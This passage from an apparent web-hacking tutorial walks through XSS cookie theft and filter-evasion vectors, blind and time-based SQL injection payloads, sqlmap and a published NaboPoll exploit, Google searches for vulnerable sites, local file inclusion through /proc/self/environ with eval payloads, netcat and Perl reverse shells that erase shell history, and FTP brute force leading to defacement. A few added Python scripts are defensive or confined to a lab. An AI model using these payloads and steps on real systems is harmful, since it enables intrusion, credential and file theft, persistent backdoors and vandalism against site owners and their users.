The entry in cookies.txt holds the session identifiers of the site (here a phpBB forum, the same phpbb2mysql_sid seen in chapter 03) plus whatever else the site stores client-side. With a live session identifier the attacker loads the forum with that cookie set and is logged in as the victim, without the password. The trick does not depend on the browser: Internet Explorer, Opera and Firefox all expose document.cookie to script running on the page, unless the cookie was set with the HttpOnly attribute.

The defence is on the server. Every value that comes from the user (query string, form field, cookie, header) must be treated as text and escaped before it is written into HTML; a blacklist of a few tags is not enough, because the attacker chooses the tag, and any HTML that gets through can carry script.
XSS can also be used to read the HTML of the page the script runs in, for example to capture a form that was filled in. The following snippet copies the whole document into a variable:

    <script>
    function ShowPage(){
        // page points at the <html> element (this assumes the tag carries id="html";
        // document.documentElement works without it)
        var page = document.getElementById("html");
        // CodeOfPage receives its HTML source
        var CodeOfPage = page.innerHTML;
        // show it; an attacker would send it to his server instead
        alert(CodeOfPage);
    }
    </script>
Does XSS always need a <script> tag? No. Any HTML that makes the browser evaluate JavaScript (or VBScript in Internet Explorer) will do, which matters when a filter strips <script> and nothing else. Some of the alternatives, most of which behave differently from one browser to another (several work only in older versions of Internet Explorer):

<META>. A refresh with a javascript: URL in the CONTENT attribute:

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<BODY>. Either a javascript: background or the onload event:

    <BODY BACKGROUND="javascript:alert('XSS')">
    <BODY ONLOAD=alert('XSS')>

<IMG>. A javascript: URL in SRC, in all the quoting variants a filter might miss:

    <IMG SRC=javascript:alert('XSS')>
    <IMG SRC="javascript:alert('XSS')">
    <IMG SRC=javascript:alert("XSS")>
    <IMG SRC="
    javascript:alert('XSS');">

and the VBScript equivalent:

    <IMG SRC='vbscript:msgbox("XSS")'>

<STYLE>. Internet Explorer accepts a style block whose TYPE is a script language:

    <STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<TABLE>. The BACKGROUND attribute takes a URL, so it takes a javascript: URL:

    <TABLE BACKGROUND="javascript:alert('XSS')">

<DIV>. Anything between <div> and </div> can carry a style, and the style can carry a URL or (in Internet Explorer) an expression():

    <DIV STYLE="background-image: url(javascript:alert('XSS'))">
    <DIV STYLE="width: expression(alert('XSS'));">

<STYLE> again, defining a class with a javascript: background and applying it to an element:

    <STYLE>.XSS{background-image:url("javascript:alert('Hacked')");}</STYLE><A CLASS=XSS></A>

or directly on BODY:

    <STYLE type="text/css">BODY{background:url("javascript:alert('Hacked')")}</STYLE>

<BGSOUND>. Its SRC is a URL as well:

    <BGSOUND SRC="javascript:alert('XSS');">

<IMG> once more. Internet Explorer also loads DYNSRC and LOWSRC, with the same effect as SRC.

To sum up, a page is vulnerable to XSS when user input reaches the HTML in any of these positions: as a <script> block, as a script in another language such as VBScript, as a javascript: URL in an attribute, or as an event handler.
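The vector list above is the reason tag blacklists fail. The following Python script is an added example and not code from the book: strip_script_tags() is the kind of filter the text warns about, which removes <script> and nothing else, and ActiveContentScanner walks the HTML with the standard library parser and flags every attribute or stylesheet in which the browser would evaluate code. The vectors are the ones listed above, reproduced as constructed test input; the attribute lists and the rule set are this example's own choices, not a complete XSS filter.

```python
import re
from html.parser import HTMLParser

# The vectors from the list above, reproduced as test input.
VECTORS = [
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">",
    "<BODY BACKGROUND=\"javascript:alert('XSS')\">",
    "<BODY ONLOAD=alert('XSS')>",
    "<IMG SRC=javascript:alert('XSS')>",
    "<IMG SRC=\"\njavascript:alert('XSS');\">",
    "<IMG SRC='vbscript:msgbox(\"XSS\")'>",
    "<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>",
    "<TABLE BACKGROUND=\"javascript:alert('XSS')\">",
    "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
    "<DIV STYLE=\"width: expression(alert('XSS'));\">",
    "<STYLE>.XSS{background-image:url(\"javascript:alert('Hacked')\");}</STYLE><A CLASS=XSS></A>",
    "<BGSOUND SRC=\"javascript:alert('XSS');\">",
    "<IMG DYNSRC=\"javascript:alert('XSS')\">",
]

def strip_script_tags(fragment):
    """The kind of filter the text warns about: it removes <script> tags and nothing else."""
    return re.sub(r"</?\s*script[^>]*>", "", fragment, flags=re.IGNORECASE)

class ActiveContentScanner(HTMLParser):
    """Flags every place in the fragment where the browser would evaluate code."""
    URL_ATTRS = {"src", "href", "background", "dynsrc", "lowsrc", "action", "content"}
    SCRIPT_URI = re.compile(r"(javascript|vbscript)\s*:", re.IGNORECASE)

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append((tag, None, "script element"))
        if tag == "style":
            self._in_style = True
        for name, value in attrs:
            value = (value or "").strip().lower()
            if name.startswith("on"):
                self.findings.append((tag, name, "event handler"))
            elif name in self.URL_ATTRS and self.SCRIPT_URI.search(value):
                self.findings.append((tag, name, "script URI"))
            elif name == "style" and (self.SCRIPT_URI.search(value) or "expression(" in value):
                self.findings.append((tag, name, "active style"))
            elif tag == "style" and name == "type" and value != "text/css":
                self.findings.append((tag, name, "script-typed style block"))

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        # stylesheet text: url(javascript:...) and expression() are evaluated too
        if self._in_style:
            low = data.lower()
            if self.SCRIPT_URI.search(low) or "expression(" in low:
                self.findings.append(("style", None, "script URI in stylesheet"))

def active_content(fragment):
    """List of (tag, attribute, reason) findings; empty for inert HTML."""
    scanner = ActiveContentScanner()
    scanner.feed(fragment)
    scanner.close()
    return scanner.findings

if __name__ == "__main__":
    for vector in VECTORS:
        survived = strip_script_tags(vector) == vector
        print("passes blacklist:", survived, "| flagged:", active_content(vector))
```

Every vector passes the blacklist untouched and every one is caught by the attribute-level scan. The practical lesson is the one the chapter draws: escape on output rather than try to enumerate dangerous tags, and if HTML must be allowed, allow-list tags and attributes instead of black-listing them.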
07. Blind SQL injection

Everything above relied on the database telling us something: an error message, or rows from a UNION shown in the page. Many scripts show neither. MySQL, MS SQL and the others are still injectable there, but the attacker has to work blind, reading the answer out of the page's behaviour instead of its text.

Prerequisites, for MySQL. The injected fragment must end cleanly, so the rest of the original query is either kept syntactically valid or commented out (-- or /* ... */). The statement type matters: in a SELECT the attacker appends conditions; in an INSERT the injected value lands inside VALUES() (see below), where a subquery still runs even though nothing is displayed. And the attacker needs a condition that changes what the page does: a news item that is shown when the condition is true and missing when it is false.

Take a news script:

    news.php?id=12

First confirm that the page reacts to a boolean:

    news.php?id=12 and 1=1
    news.php?id=12 and 1=2

If the first shows the item and the second shows an empty page (or an error, or a different page), every later question is asked the same way: true looks like 1=1, false looks like 1=2.

Next, find out which MySQL is running, because the later queries depend on it. @@version holds the server version string; substring() takes its first character:

    news.php?id=12 and substring(@@version,1,1)=4

If the item is shown, the first character of the version is 4, i.e. MySQL 4; otherwise try 5 and then 3. This matters: MySQL 3 has no subselects and no UNION, so the techniques below need version 4 or later, and version 5 adds information_schema. A subselect test is just as simple:

    news.php?id=12 and (select 1)=1
If (select 1)=1 shows the item, subselects work and the attacker can start asking about tables. The first target is mysql.user:

    news.php?id=12 and (SELECT 1 from mysql.user limit 0,1)=1

If the item is still shown, the web application's database account can read mysql.user, which holds every MySQL login and password hash, and the same account is usually allowed load_file() and SELECT ... INTO OUTFILE as well. If the item disappears, the subquery failed: either the table is not readable or it is empty. limit 0,1 makes sure that at most one row is returned, since a comparison against a multi-row subquery is an error. On MySQL 5 the next stop is information_schema, which lists every table and column the account can see; on MySQL 4 table names have to be guessed. The application's own tables are probed in the same way:

    news.php?id=12 and (SELECT 1 from users limit 0,1)=1

shows the item if a table users exists and has rows.

Reading data one character at a time. Once a table is known, its contents are extracted character by character. First confirm the column:

    news.php?id=12 and (SELECT substring(concat(1,password),1,1) from users limit 0,1)=1

concat(1,password) prepends a 1 to the password so that the comparison is true even when the password is empty; if this is false, the column does not exist. From here on the reading is done with substring() and ascii(). Suppose users has the columns username, password, email and userid, and we want the username and password of userid 2:

    news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100

where userid=2 replaces limit 0,1 and selects a single row; concat(username,0x3a,password) joins the two fields with a colon (0x3a) so that they come out as one string; substring(...,1,1) takes its first character; ascii() turns it into its ASCII code, and the page is shown if that code is greater than 100. Say it is not shown. Then the code is at most 100; try 80:

    news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>80

Shown, so the code lies between 81 and 100. Narrow it down with the same query:

    ... >90    (not shown: at most 90)
    ... >85    (shown: above 85)
    ... >86    (not shown: at most 86)

Above 85 and at most 86 means the code is 86, the character V (char(86)). Move substring() to the second character:

    news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>100

Shown, so above 100; then

    ... >110   (not shown)
    ... >105   (not shown)
    ... >103   (shown)
    ... >104   (shown)

Above 104 and at most 105: 105, the character i. The username starts with Vi. Continue with positions 3, 4, ... until the end of the string: when the position runs past it, substring() returns an empty string and ascii() returns 0, so >0 is false. Everything before the colon is the username; everything after it is the password, usually a hash (see the cracking chapter).
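The halving in the walk-through above (>100, >80, >90, >85, >86) is a binary search over the ASCII range, and it can be automated. The following Python script is an added example rather than the book's code or any exploit's: it runs a news.php-style query against an in-memory SQLite database with a constructed users table, with concat(), substring() and ascii() registered as user functions so that the chapter's MySQL payload text can be used unchanged (char(58) stands in for 0x3a, which SQLite would read as a number). extract_field() asks the page-shown/page-empty oracle eight questions per character and stops at the first character whose code is 0.

```python
import sqlite3

# Constructed data: the users table the chapter reads userid 2 from.
SCHEMA = """
CREATE TABLE news (id INTEGER, title TEXT);
INSERT INTO news VALUES (12, 'Forum opened');
CREATE TABLE users (userid INTEGER, username TEXT, password TEXT, email TEXT);
INSERT INTO users VALUES (1, 'admin', '21232f297a57a5a743894a0e4a801fc3', 'admin@site.com'),
                         (2, 'Vika',  'e10adc3949ba59abbe56e057f20f883e', 'vika@site.com');
"""

def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    # MySQL functions used by the payloads, defined on top of SQLite.
    conn.create_function("concat", -1, lambda *parts: "".join(str(p) for p in parts))
    conn.create_function("substring", 3,
                         lambda s, pos, n: ("" if s is None else str(s))[pos - 1:pos - 1 + n])
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    return conn

def page_shows_item(conn, id_param):
    """news.php: True when the query returns the news item, False when it returns nothing."""
    sql = "SELECT title FROM news WHERE id=%s" % id_param    # the injection point
    return conn.execute(sql).fetchone() is not None

def extract_field(conn, subquery, queries=None):
    """Blind, character-by-character extraction of the value returned by subquery."""
    result = []
    pos = 1
    while True:
        low, high = 0, 255
        while low < high:                    # binary search over the ASCII range
            mid = (low + high) // 2
            payload = "12 and ascii(substring((%s),%d,1))>%d" % (subquery, pos, mid)
            if queries is not None:
                queries.append(payload)
            if page_shows_item(conn, payload):
                low = mid + 1                # code is above mid
            else:
                high = mid                   # code is at most mid
        if low == 0:                         # past the end of the string: ascii('') is 0
            return "".join(result)
        result.append(chr(low))
        pos += 1

SUBQUERY = "SELECT concat(username,char(58),password) from users where userid=2"

if __name__ == "__main__":
    db = connect()
    log = []
    print(extract_field(db, SUBQUERY, log))
    print(len(log), "requests")
```

Eight requests per character, plus eight for the terminating 0, is the cost of the generic search; the chapter's later remark about MD5 hashes (16 possible characters, so four requests each) is the same loop with a smaller range.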
Blind SQL injection in NaboPoll

Damn Vulnerable Linux ships NaboPoll (a PHP polling script) as a practice target. Its results.php is vulnerable to blind SQL injection. The relevant lines (27 to 31) are:

    $res_question = mysql_query("select * from nabopoll_questions
        where survey=$survey order by id");
    if ($res_question == FALSE || mysql_numrows($res_question) == 0)
        error($row_survey, "questions not found");

$survey comes from the request and is neither checked nor quoted, so it is a textbook blind injection point: the attacker's condition is appended to the where clause, and the only feedback is whether the questions are shown or a "not found" error appears.
[Fig. 07.1. The NaboPoll poll page on the DVL box, served from http://localhost/webexploitation_package_02/]
Click Actions and choose a poll; its results page (fig. 07.2) is requested as

    http://localhost/webexploitation_package_02/nabopoll/result.php?surv=1

Append the following to surv=1:

    /**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),1,1))>125),1,0)))

This is the same blind technique as in news.php, wrapped for NaboPoll. The /**/ comments stand in for spaces, so the payload survives even when spaces are stripped or the URL is left unencoded. AND 1=(SELECT ...) compares 1 with the value of the IF(): when the condition is true IF() returns 1, the where clause becomes AND 1=1 and the poll is shown; when it is false IF() returns 0, the clause becomes AND 1=0 and the script answers with "survey not found" (fig. 07.3). The condition itself is the familiar one: is the ASCII code of the first character of the MySQL user name (user()) greater than 125?
[Fig. 07.2. NaboPoll results page, result.php?surv=1, with vote counts 0%(0)]

[Fig. 07.3. The same page with a false injected condition: NaboPoll answers "not found"]
The answer is no (the code is not above 125), so try 100 and narrow down: the first character's code turns out to be 114, the letter r. For the second character move SUBSTRING() on by one:

    /**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),2,1))>114),1,0)))

and so on; the second character is 111, o. Doing this by hand for every character is tedious, which is why exploits exist. A ready-made one for NaboPoll is published at

    http://packetstormsecurity.org/0702-exploits/nabopoll-sql.txt

It is a PHP script (it starts with <?) and needs only its variables adjusted (fig. 07.4): $survey is 1 and $path, for the DVL installation, is

    /webexploitation_package_02/nabopoll
[Fig. 07.4. The header of the NaboPoll exploit: "Nabopoll Blind SQL Injection Exploit", download www.nabocorp.com/nabopoll/, coded by sOcratex; the defaults to change are $srv = "localhost"; $path = "/poll"; $port = 80; $survey = 8 ("you can verify the number entering in the site and viewing the results")]
Save the exploit as nabopoll.php, for example in /tmp, and run it with

    php nabopoll.php

It extracts the MySQL user name one character at a time (fig. 07.5): here root@localhost, which means the poll script connects to MySQL as root, the worst case for the site.

[Fig. 07.5. The NaboPoll exploit ("Proof of Concept Exploit") printing the characters of user()]

Blind injection is slow because each character costs a sequence of requests: the exploit searches the range 0 to 255 by halving it, so eight requests per character, and every request is a full page load. With the user name known, the same exploit can be pointed at anything the query may read. The most useful substitute for user() is load_file(), which returns the contents of a file the MySQL server can read, for example /etc/passwd; to avoid quotes, the file name is given as a hex string:

    load_file(0x2f6574632f706173737764)

Fig. 07.6 shows the result. The time needed depends on the length of the data and on the alphabet: a 100-character file read at eight requests per character is 800 requests, and a slow server turns that into minutes. An MD5 password hash, on the other hand, is 32 characters drawn from only 0-9 and a-f, so the search per character needs 4 requests instead of 8 and the whole hash is read in about 130 requests.

[Fig. 07.6. The NaboPoll exploit reading /etc/passwd through load_file()]
Automating with sqlmap

Suppose the injection is in news.php on site.com and the database is MySQL 5. sqlmap does the character-by-character work:

    ./sqlmap.py -u "http://site.com/news.php?id=12" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(username,0x3a,password) from users where userid=2)"

-u is the URL; -p names the parameter to inject (id). -a makes sqlmap pick a random User-Agent from the given file instead of announcing itself as sqlmap (a detail administrators look for). -v1 sets the verbosity. --string is the text that appears in the page only when the injected condition is true, the equivalent of the 1=1 / 1=2 test above; sqlmap uses it to tell true from false. -e is the expression (a SELECT) whose value sqlmap retrieves.

sqlmap detects the MySQL version itself and adapts. On MySQL 5 it can also read information_schema, so instead of guessing the table that holds passwords, ask for every column whose name contains pass (MySQL 4 has no information_schema, so there the guessing stays manual):

    ./sqlmap.py -u "http://site.com/news.php?id=12" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(table_schema,0x3a,table_name,0x3a,column_name) from information_schema.columns where column_name like 0x257061737325 limit 0,1)"

The like pattern is given as hex (0x257061737325 is '%pass%') so that no quotes are needed, which keeps the payload working when magic_quotes is on. limit 0,1 returns the first match; raise the offset to walk through the rest. sqlmap has many more options, including enumerating the database structure on its own.
Finding injection points

Vulnerable scripts are easy to find because they announce themselves. A page that prints

    Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/site/public_html/detail.php on line 377

is reporting that a query failed, typically because something odd arrived in a parameter. Test the parameter (say id) in the usual way: id=29 and 1=1 should show the original page, id=29 and 1=2 a different one. If so, the script is injectable, and 29 is a real row the page exists for.

Google finds such pages in bulk. Search for the warning text

    Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource

and, for a particular country, add site:fr, site:uk and so on. Not every hit is exploitable: the query may be one where a UNION cannot be appended, or the output may never reach the page. Blind injection still works in most of them. For example, to read /etc/passwd through such a parameter:

    id=29 and 1=(SELECT/**/(IF((ASCII(SUBSTRING(load_file(0x2f6574632f706173737764),1,1))<=255),1,0)))

This is the NaboPoll payload with load_file(); the condition <=255 is always true when the file is readable, so the page is shown only if the MySQL account has the FILE privilege and the file exists. Then feed the same expression to the exploit from the NaboPoll section (or to sqlmap) to read it character by character. In practice about nine out of ten injectable sites also answer the ordinary functions user(), database(), version() and @@version_compile_os, which give the MySQL account, the current database, the server version and the operating system it was built for.
Time-based blind injection

What if the injection point is not in a SELECT but in an INSERT (a new record) or an UPDATE, and nothing the query produces is ever displayed? Then there is no page to compare, but there is still a clock. MySQL has benchmark(), PostgreSQL has pg_sleep() and MS SQL has waitfor delay: each makes the query take noticeably longer, so a condition can be read by measuring the response time. With benchmark() the delay comes from making the server repeat an expression many times; it is therefore a function of the server's CPU and load, not a fixed interval like pg_sleep().

Suppose the application runs

    INSERT INTO table VALUES ('aaa', 'bbb', '[sql]', 'xxx');

where aaa, bbb and xxx are fixed and [sql] is the attacker's input. A subquery can be placed inside the third value:

    INSERT INTO table VALUES ('aaa', 'bbb', '' OR 1=if(ascii(lower(substring((select user from mysql.user limit 1),1,1)))>0, benchmark(999999,md5(now())), 1), 'hacked')/*', 'xxx');

The if() runs benchmark() when the condition is true and returns 1 at once when it is false. The condition here is whether the first character of the first user in mysql.user has an ASCII code above 0, which it always does, so the query computes benchmark(999999,md5(now())), 999,999 MD5 hashes, and the request is noticeably slower than usual. The /* comments out the rest of the original statement, and 'hacked' is the value that actually gets stored. Now the same query with a condition that is always false:

    INSERT INTO table VALUES ('aaa', 'bbb', '' OR 1=if(ascii(lower(substring((select user from mysql.user limit 1),1,1)))>255, benchmark(999999,md5(now())), 1), 'hacked')/*', 'xxx');

returns immediately. With a slow and a fast reference in hand, the character-by-character search from the previous section works exactly as before, with "page shown" replaced by "response took longer".

Points to keep in mind about benchmark():

- the delay depends on the server: 999,999 iterations may take a fraction of a second on a fast machine and tens of seconds on a busy one, so calibrate the count first;
- a busy server makes timings noisy; repeat a measurement before trusting it;
- the load you create is visible to the administrator, and too large a count is a denial of service;
- benchmark() is MySQL-specific; on other databases use the delay functions named above.
08. Local file inclusion via /proc/self/environ

Suppose the target (http://site.com) runs a PHP script with an include whose argument comes from the page parameter, so that page=../../../../etc/passwd reads files. Reading is useful, but the goal is to execute code, and for that the attacker needs a file on the server whose contents he controls. If the filesystem is otherwise closed to him, neither /tmp nor the web root is an option. There is one file whose contents every visitor controls: /proc/self/environ.

On a *nix system /proc is a virtual filesystem that exposes the kernel's view of each process; /proc/<pid> is the directory of process <pid>, and /proc/self is a symbolic link to the directory of whichever process is reading it. When Apache (more precisely, the PHP interpreter running inside it) opens /proc/self/environ, it reads its own environment, and that environment includes the request headers, among them the User-Agent. Include /proc/self/environ and you see something like:

    PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
    SERVER_ADMIN=admin@site.com
    ...

Now send a User-Agent header containing PHP code:

    curl "http://site.com/index.php?page=../../../../../../../../proc/self/environ&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"

The environment now contains the code, the include parses it, eval() runs the cmd parameter, and the phpinfo() output appears in the page:

    PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
    SERVER_ADMIN=admin@site.com
    <?php eval($_GET[cmd]); ?> HTTP_KEEP_ALIVE=150

Whether this works depends on the server: /proc must be readable by the web server user, and the include must reach /proc/self/environ (the number of ../ depends on where the script lives).

Apache's logs are the usual alternative. If access_log or error_log is readable, the User-Agent ends up there too, but the path to the log must be known. The file descriptors in /proc make the path unnecessary: Apache keeps its logs open, and

    /proc/{PID}/fd/{FD_ID}

is the log file itself, where {PID} is the Apache process id (readable from /proc/self/status) and {FD_ID} is the descriptor number, usually between 2 and 7 for Apache's logs. First read the status file:

    http://site.com/index.php?page=../../../../../../../../proc/self/status

then, if the PID is 1228, include the descriptor:

    curl "http://site.com/index.php?page=../../../../../../../../proc/1228/fd/2&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"

The PID can be skipped altogether with self:

    curl "http://site.com/index.php?page=../../../../../../../../proc/self/fd/2&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"

This is less predictable, since self refers to whichever Apache child handles this request (with a prefork server, a different process each time), and the descriptor numbering can differ between them. Both variants were described by Secteam.

Inclusion through e-mail

The same idea works with a mailbox, since Unix systems keep each user's incoming mail in a file:

1. Find out which user the web server runs as (a phpinfo() page or an include of /etc/passwd helps).
2. Send a message containing PHP code to that user at the site, for example wwwrun@site.com. Common web server accounts are wwwrun, www-data, nobody, www, apache and wwwdata.
3. The message lands in /var/mail/wwwrun (or /var/spool/mail/wwwrun), a file the web server user can read.

Include it with curl:

    curl "http://site.com/index.php?page=../../../../../../../../var/mail/wwwrun&cmd=phpinfo();"

The mail must actually be delivered locally, so the server has to be running a mail transfer agent that accepts mail for that host; if it is not, the include returns an empty file.
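The three variants above are one bug: a path built from the page parameter with nothing stopping ../ from leaving the include directory. The following Python script is an added example and not code from the book or from any PHP application: it builds a constructed web root in a temporary directory, shows what an index.php-style join does with the /proc/self/environ traversal from the text, and beside it a resolver that canonicalises the path and refuses anything outside the include directory or without the expected extension.

```python
import os
import tempfile
from pathlib import Path

# A constructed web root with a single legitimate page, built in a temp dir.
WEBROOT = Path(tempfile.mkdtemp(prefix="webroot-"))
PAGES = WEBROOT / "pages"
PAGES.mkdir()
(PAGES / "about.php").write_text("<h1>About</h1>\n")

TRAVERSAL = "../../../../../../../../proc/self/environ"

def include_vulnerable(page):
    """index.php-style include: the parameter is joined to the pages directory as-is."""
    path = os.path.join(PAGES, page)
    return os.path.normpath(path)

def include_safe(page):
    """Resolve the requested page and refuse anything that leaves the pages directory."""
    base = PAGES.resolve()
    target = (base / page).resolve()
    if base != target and base not in target.parents:
        raise ValueError("path escapes the include directory: %s" % page)
    if target.suffix != ".php" or not target.is_file():
        raise ValueError("not an includable page: %s" % page)
    return target

def escapes_root(path):
    """True when the resolved path lies outside the web root (the LFI case)."""
    return WEBROOT.resolve() not in Path(path).resolve().parents

if __name__ == "__main__":
    print("vulnerable resolves to:", include_vulnerable(TRAVERSAL))
    try:
        include_safe(TRAVERSAL)
    except ValueError as exc:
        print("safe rejected:", exc)
    print("safe resolves to:", include_safe("about.php"))
```

Eight ../ segments from a directory three levels deep collapse at the filesystem root, which is why the number of ../ in the text does not have to be exact: any surplus is harmless to the attacker. The check in include_safe() compares canonical paths, so encoded or mixed separators do not help either; an allow-list of page names would be stricter still.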
09. CRLF injection
0A. Back-connect shells

Getting in is half the job; the other half is getting a usable shell and coming back later. Remote command execution through a web script (chapter 08) gives commands without a terminal, and a port opened on the server is often blocked by a firewall, so the standard move is a back connect (reverse shell): the server connects out to the attacker's machine, which is listening, and hands it a shell. The tool for both ends is netcat. The examples below are run on a Unix system (Linux), on a single machine (127.0.0.1) so that they can be tried on DVL; in reality the listener is the attacker's host.

The listener:

    nc -l -n -vv -p 25

-l listens instead of connecting, -n skips DNS lookups, -p 25 is the port (any port the server's firewall allows out; 25 and 80 are usual choices), -v prints what happens and -vv prints more (very verbose).

The back connect, on the compromised machine:

    nc -e /bin/sh 127.0.0.1 25

-e hands the connection to /bin/sh, so everything the listener types is executed by the shell on the server; 127.0.0.1 and 25 are the listener's address and port. Run the listener first (it waits), then the back connect from a second terminal, as the user nobody (su nobody) to simulate a web server account; the listener prints

    connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1]

and the shell is yours (fig. 0A.1). id shows nobody, which is where privilege escalation (chapter 0D) comes in; uname -a shows the kernel. Type exit to end the session, or press Ctrl+C on the listener.

[Fig. 0A.1. A netcat listener on port 25 receiving a back connect; id reports the user nobody with groups=98(nobody),99(nogroup)]

What if netcat is not installed on the server, or was built without -e (many distributions disable it)? Then the back connect is written in whatever interpreter is present, and Perl almost always is.
A Perl back connect, from http://otaku-studios.com/showthread.php/72978-Perl-Backconnect (the IHS back-connect backdoor), with its typos corrected:

    #!/usr/bin/perl
    use IO::Socket;
    use Socket;
    use FileHandle;

    $system = '/bin/bash';
    $ARGC = @ARGV;
    print "IHS BACK-CONNECT BACKDOOR\n\n";
    if ($ARGC != 2) {
        print "Usage: $0 [Host] [Port] \n\n";
        die "Ex: $0 127.0.0.1 2121 \n";
    }
    socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
    connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
    print "[*] Resolving HostName\n";
    print "[*] Connecting... $ARGV[0] \n";
    print "[*] Spawning Shell \n";
    print "[*] Connected to remote host \n";
    SOCKET->autoflush();
    # point the shell's standard streams at the socket
    open(STDIN, ">&SOCKET");
    open(STDOUT, ">&SOCKET");
    open(STDERR, ">&SOCKET");
    print "IHS BACK-CONNECT BACKDOOR \n\n";
    system("unset HISTFILE; unset SAVEHIST; echo -- Systeminfo --; uname -a; echo; echo -- User info --; id; echo; echo -- Directory --; pwd; echo; echo -- Shell --; $system");
    #EOF

Type it into an editor (Kate, or any other) and save it in /tmp as bc.pl. Test it as an unprivileged user: su nobody, then make the script executable:

    chmod 755 /tmp/bc.pl

start the listener in another terminal (it waits after Enter):

    nc -l -n -vv -p 25

and run the back connect:

    /tmp/bc.pl 127.0.0.1 25
[Fig. 0A.2. The listener receiving the Perl back connect: "-- Systeminfo --", "-- User info --" with the nobody account, "-- Directory --" /root, then the shell]

The first two commands the script runs,

    unset HISTFILE
    unset SAVEHIST

stop the shell from writing the session to .bash_history, so that nothing the attacker types is left in the user's home directory. The shell that comes back is an ordinary /bin/bash, so any command works, and the script can be left on the server as a backdoor to be started again later (through the web hole, a cron entry, or whatever is available). The same goes for a netcat binary: if the server has none, upload one.
Where to put such files on a server where you are not root? Look for directories that anyone can write to (mode drwxrwxrwx); besides /tmp there are often others. find lists them:

    find / -type d -perm -0777 -print > /tmp/.file &

The & runs the search in the background, since it can take a while; the result is in /tmp/.file.
0B. Password brute force

/etc/passwd lists the accounts; if it can be read (through an include, a blind injection, or an FTP download), the next step is a password for one of them, and the cheapest way is guessing (brute force). An attacker has two kinds of list: a dictionary of common passwords, and the logins themselves, because in practice 1 to 3 per cent of accounts use the login as the password. A combo list built from /etc/passwd therefore starts with

    user1:user1
    user2:user2
    ...
    userN:userN

On Windows the classic tool is Brutus 2 (http://www.hoobie.net/brutus); for checking a single guess by hand, PuTTY (also Windows). PuTTY is a terminal client: point it at a host and port and it opens a session (fig. 0B.1). On Linux the same is done with ssh and telnet.

Services worth attacking: port 21 (FTP), 110 (POP3, which also takes a login and password), 23 (telnet) and 22 (SSH). Brutus does not speak SSH; for that there is BruteSSH from BackTrack 4.

In PuTTY, enter the target's address in the Host name (or IP address) field (www.site.com in the example), choose SSH, and the port is 22.
[Fig. 0B.1. PuTTY session dialog: Host Name (or IP address), Port 22, Connection type Raw/Telnet/Rlogin/SSH/Serial, Saved Sessions with Default Settings, Load/Save/Delete, Open/Cancel]
Press Open: a terminal window appears with the prompt login as:, and after the login the SSH server asks for the password. In the examples the target is 127.0.0.1, which lets you practise on your own machine. For ports 21, 25 and 110 set Port accordingly and choose Raw as the Connection type; the session then shows the raw protocol, and you type the protocol commands yourself.

Brutus (fig. 0B.2) does the guessing. Enter the target and choose the type of service. Take port 21 (FTP). The root account does not usually have FTP access, so the attacker goes for ordinary accounts; what root cannot do, an ordinary user often can. Under Pass Mode choose Combo List and give the combo file (user:password pairs); Brutus also accepts a user list and a separate word list.
[Fig. 0B.2. Brutus: Target 127.0.0.1, Type FTP, Port 21, Connections 10, Timeout 10, Use Proxy; FTP Options: Modify sequence, attempts; Authentication Options: Pass Mode Combo List, Delimiter, Browse; Start/Stop; status Idle]
Which passwords go into the list? The classic study by Morris and Grampp found most passwords guessable from a short list; twenty years on the picture is the same, and a list of about 200 common passwords covers a large share of accounts. Brutus ships with words.txt as a starting point. Add to it the things users actually pick: first names, the names of relatives and pets, dates of birth, keyboard rows (qwerty, 12345), the login itself, and simple words in the local language.
[Fig. 0B.3. TYPSoft FTP Server user list: Anonymous and a test user with password 12345, root directory c:\temp; Directory Access, New User/Copy User/Rename User/Delete User]

[Fig. 0B.4. Brutus with a User File (users.txt) and a word list, and the combo.txt file: target 127.0.0.1, the found username/password pair shown as 12345 / midnight]

[Fig. 0B.5. The Brutus log at 22:50:35: connections to the FTP target and the result of the run]
Say the FTP password is found. Connect with any FTP client (Total Commander on Windows shows the server as a second panel) and look around. Even plain FTP access is enough to deface the site: rename index.html to index.old, upload a new index.html and the front page is replaced; if the site uses index.php, that is the file to replace. The FTP account often also shows the rest of the tree, configuration files included.

FTP can be driven by hand from PuTTY as well: host localhost, port 21, connection type Raw. The server answers with its banner (fig. 0B.6), here

    220 TYPSoft FTP Server 1.10 Ready...

and the commands USER and PASS log you in.

[Fig. 0B.6. FTP session through PuTTY in Raw mode: the server banner and the USER/PASS exchange]

